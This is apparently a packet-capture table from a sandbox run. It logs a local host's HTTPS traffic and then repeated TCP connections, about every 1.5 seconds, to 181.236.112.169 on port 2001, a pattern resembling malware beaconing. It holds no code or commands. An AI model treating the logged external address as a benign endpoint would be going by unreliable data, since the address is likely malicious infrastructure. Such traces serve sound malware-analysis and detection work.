                                                                                              Oct 31, 2024 07:41:19.254317999 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.283299923 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.283328056 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.283344984 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.283503056 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.283521891 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.338071108 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.372190952 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.372231960 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.372260094 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.372284889 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.372298002 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.372318029 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.372348070 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.372364998 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.372419119 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.372436047 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.373243093 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.373270035 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.373316050 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.373330116 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.373379946 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.402278900 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.402327061 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.402353048 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.402374983 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.402393103 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.402442932 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.491166115 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.491288900 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.491333008 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.491365910 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.491373062 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.491409063 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.491440058 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.492258072 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.492319107 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.492333889 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.492403984 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.521172047 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.521219969 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.521270037 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.521286964 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.521328926 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.521358013 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.610155106 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.610203028 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.610240936 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.610270977 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.610295057 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.610321999 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.610342026 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.611121893 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.611183882 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.640397072 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.640470982 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.729042053 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.729127884 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.729203939 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.729265928 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.729306936 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.729361057 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:19.730283976 CET44349736188.114.97.3192.168.2.4
                                                                                              Oct 31, 2024 07:41:19.730335951 CET49736443192.168.2.4188.114.97.3
                                                                                              Oct 31, 2024 07:41:23.614911079 CET200149742181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:24.168287039 CET200149742181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:24.168349981 CET497422001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:24.168405056 CET497422001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:24.173141956 CET200149742181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:25.182823896 CET497432001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:25.187647104 CET200149743181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:25.190184116 CET497432001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:25.190505981 CET497432001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:25.195275068 CET200149743181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:25.740830898 CET200149743181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:25.740895033 CET497432001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:25.740942001 CET497432001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:25.745733023 CET200149743181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:26.749363899 CET497442001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:26.754239082 CET200149744181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:26.754323006 CET497442001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:26.756293058 CET497442001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:26.761130095 CET200149744181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:27.304760933 CET200149744181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:27.304835081 CET497442001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:27.304883957 CET497442001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:27.309730053 CET200149744181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:28.307629108 CET497452001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:28.312520027 CET200149745181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:28.312591076 CET497452001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:28.312937975 CET497452001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:28.317709923 CET200149745181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:28.864036083 CET200149745181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:28.864114046 CET497452001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:28.864193916 CET497452001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:28.869400024 CET200149745181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:29.870443106 CET497462001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:29.875329971 CET200149746181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:29.875406981 CET497462001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:29.875749111 CET497462001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:29.880619049 CET200149746181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:30.432914972 CET200149746181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:30.432971954 CET497462001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:30.433022976 CET497462001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:30.437979937 CET200149746181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:31.448164940 CET497472001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:31.453205109 CET200149747181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:31.453289032 CET497472001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:31.453622103 CET497472001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:31.458539963 CET200149747181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:32.267869949 CET200149747181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:32.268239021 CET200149747181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:32.268377066 CET497472001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:32.270159006 CET497472001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:32.275755882 CET200149747181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:33.276213884 CET497482001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:33.952852011 CET200149748181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:33.953041077 CET497482001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:33.953404903 CET497482001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:33.958151102 CET200149748181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:34.511995077 CET200149748181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:34.512077093 CET497482001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:34.512109995 CET497482001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:34.516871929 CET200149748181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:35.526367903 CET497492001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:35.531337023 CET200149749181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:35.531415939 CET497492001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:35.531714916 CET497492001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:35.536592960 CET200149749181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:36.089909077 CET200149749181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:36.089992046 CET497492001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:36.090048075 CET497492001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:36.094959021 CET200149749181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:37.104551077 CET497502001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:37.109517097 CET200149750181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:37.109621048 CET497502001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:37.109960079 CET497502001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:37.114736080 CET200149750181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:37.660305023 CET200149750181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:37.660368919 CET497502001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:37.660439968 CET497502001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:37.665868998 CET200149750181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:38.669819117 CET497512001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:38.675028086 CET200149751181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:38.675110102 CET497512001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:38.675447941 CET497512001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:38.680250883 CET200149751181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:39.217823029 CET200149751181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:39.217925072 CET497512001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:39.217998981 CET497512001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:39.222918034 CET200149751181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:40.229500055 CET497522001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:40.234428883 CET200149752181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:40.234508991 CET497522001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:40.234870911 CET497522001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:40.239650011 CET200149752181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:40.791227102 CET200149752181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:40.791296005 CET497522001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:40.791347980 CET497522001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:40.796232939 CET200149752181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:41.811675072 CET497532001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:41.816620111 CET200149753181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:41.816720963 CET497532001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:41.817111015 CET497532001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:41.821892977 CET200149753181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:42.375575066 CET200149753181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:42.375711918 CET497532001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:42.375822067 CET497532001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:42.380671978 CET200149753181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:43.385826111 CET497542001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:43.390852928 CET200149754181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:43.390950918 CET497542001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:43.391319036 CET497542001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:43.396087885 CET200149754181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:43.950627089 CET200149754181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:43.950701952 CET497542001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:43.950783968 CET497542001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:43.955574036 CET200149754181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:44.963911057 CET497552001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:44.968933105 CET200149755181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:44.969012022 CET497552001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:44.969399929 CET497552001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:44.974277973 CET200149755181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:45.522367001 CET200149755181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:45.522449017 CET497552001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:45.522530079 CET497552001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:45.527394056 CET200149755181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:46.526601076 CET497562001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:46.531588078 CET200149756181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:46.531698942 CET497562001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:46.532179117 CET497562001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:46.536963940 CET200149756181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:47.077120066 CET200149756181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:47.077217102 CET497562001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:47.077311039 CET497562001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:47.082068920 CET200149756181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:48.089334965 CET497572001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:48.094672918 CET200149757181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:48.094806910 CET497572001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:48.095206022 CET497572001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:48.100560904 CET200149757181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:48.646112919 CET200149757181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:48.646222115 CET497572001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:48.646307945 CET497572001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:48.651187897 CET200149757181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:49.651438951 CET497582001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:49.656462908 CET200149758181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:49.656539917 CET497582001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:49.656958103 CET497582001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:49.661763906 CET200149758181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:50.208179951 CET200149758181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:50.208256006 CET497582001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:50.208363056 CET497582001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:50.213071108 CET200149758181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:51.214850903 CET497592001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:51.219916105 CET200149759181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:51.220024109 CET497592001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:51.220516920 CET497592001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:51.225285053 CET200149759181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:51.798034906 CET200149759181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:51.798150063 CET497592001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:51.798249006 CET497592001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:51.803155899 CET200149759181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:52.807745934 CET497602001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:52.812736034 CET200149760181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:52.812830925 CET497602001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:52.815630913 CET497602001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:52.820517063 CET200149760181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:53.365606070 CET200149760181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:53.365775108 CET497602001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:53.365859032 CET497602001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:53.370646000 CET200149760181.236.112.169192.168.2.4
Timestamp                            Src Port  Dst Port  Src IP           Dst IP
Oct 31, 2024 07:41:54.370198011 CET  49761     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:41:54.375122070 CET  2001      49761     181.236.112.169  192.168.2.4
Oct 31, 2024 07:41:54.375240088 CET  49761     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:41:54.375581026 CET  49761     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:41:54.380341053 CET  2001      49761     181.236.112.169  192.168.2.4
Oct 31, 2024 07:41:54.919889927 CET  2001      49761     181.236.112.169  192.168.2.4
Oct 31, 2024 07:41:54.920087099 CET  49761     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:41:54.920087099 CET  49761     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:41:54.925046921 CET  2001      49761     181.236.112.169  192.168.2.4
Oct 31, 2024 07:41:55.932540894 CET  49762     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:41:55.937514067 CET  2001      49762     181.236.112.169  192.168.2.4
Oct 31, 2024 07:41:55.937603951 CET  49762     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:41:55.937978029 CET  49762     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:41:55.942837954 CET  2001      49762     181.236.112.169  192.168.2.4
Oct 31, 2024 07:41:56.651932001 CET  2001      49762     181.236.112.169  192.168.2.4
Oct 31, 2024 07:41:56.652053118 CET  49762     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:41:56.652127028 CET  49762     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:41:56.656933069 CET  2001      49762     181.236.112.169  192.168.2.4
Oct 31, 2024 07:41:57.667016983 CET  49764     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:41:57.671933889 CET  2001      49764     181.236.112.169  192.168.2.4
Oct 31, 2024 07:41:57.672020912 CET  49764     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:41:57.672425985 CET  49764     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:41:57.677213907 CET  2001      49764     181.236.112.169  192.168.2.4
Oct 31, 2024 07:41:58.231223106 CET  2001      49764     181.236.112.169  192.168.2.4
Oct 31, 2024 07:41:58.231283903 CET  49764     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:41:58.231360912 CET  49764     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:41:58.236171961 CET  2001      49764     181.236.112.169  192.168.2.4
Oct 31, 2024 07:41:59.245210886 CET  49766     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:41:59.250157118 CET  2001      49766     181.236.112.169  192.168.2.4
Oct 31, 2024 07:41:59.250247955 CET  49766     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:41:59.250597000 CET  49766     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:41:59.255424023 CET  2001      49766     181.236.112.169  192.168.2.4
Oct 31, 2024 07:41:59.801213980 CET  2001      49766     181.236.112.169  192.168.2.4
Oct 31, 2024 07:41:59.801295996 CET  49766     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:41:59.801395893 CET  49766     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:41:59.806158066 CET  2001      49766     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:00.807656050 CET  49777     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:00.814770937 CET  2001      49777     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:00.814851046 CET  49777     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:00.815279007 CET  49777     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:00.821058989 CET  2001      49777     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:01.365036964 CET  2001      49777     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:01.365104914 CET  49777     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:01.365169048 CET  49777     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:01.370218039 CET  2001      49777     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:02.371098042 CET  49783     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:02.375895023 CET  2001      49783     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:02.375971079 CET  49783     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:02.376348019 CET  49783     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:02.381161928 CET  2001      49783     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:02.920078039 CET  2001      49783     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:02.920176983 CET  49783     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:02.920285940 CET  49783     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:02.925088882 CET  2001      49783     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:03.932791948 CET  49794     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:03.937727928 CET  2001      49794     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:03.937844992 CET  49794     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:03.938416958 CET  49794     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:03.944494009 CET  2001      49794     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:04.488739014 CET  2001      49794     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:04.488840103 CET  49794     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:04.488893986 CET  49794     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:04.493803024 CET  2001      49794     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:05.495049000 CET  49805     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:05.500065088 CET  2001      49805     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:05.500134945 CET  49805     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:05.500474930 CET  49805     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:05.505270958 CET  2001      49805     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:06.058459044 CET  2001      49805     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:06.058517933 CET  49805     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:06.058568001 CET  49805     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:06.063462973 CET  2001      49805     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:07.073554039 CET  49816     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:07.078713894 CET  2001      49816     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:07.078818083 CET  49816     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:07.079178095 CET  49816     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:07.083982944 CET  2001      49816     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:07.629740000 CET  2001      49816     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:07.629817963 CET  49816     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:07.632901907 CET  49816     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:07.637749910 CET  2001      49816     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:08.651729107 CET  49824     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:08.656689882 CET  2001      49824     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:08.656781912 CET  49824     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:08.657244921 CET  49824     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:08.662038088 CET  2001      49824     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:09.217772961 CET  2001      49824     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:09.217855930 CET  49824     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:09.217916012 CET  49824     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:09.222879887 CET  2001      49824     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:10.233074903 CET  49833     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:10.238163948 CET  2001      49833     181.236.112.169  192.168.2.4
Oct 31, 2024 07:42:10.238262892 CET  49833     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:10.238744020 CET  49833     2001      192.168.2.4      181.236.112.169
Oct 31, 2024 07:42:10.243912935 CET  2001      49833     181.236.112.169  192.168.2.4
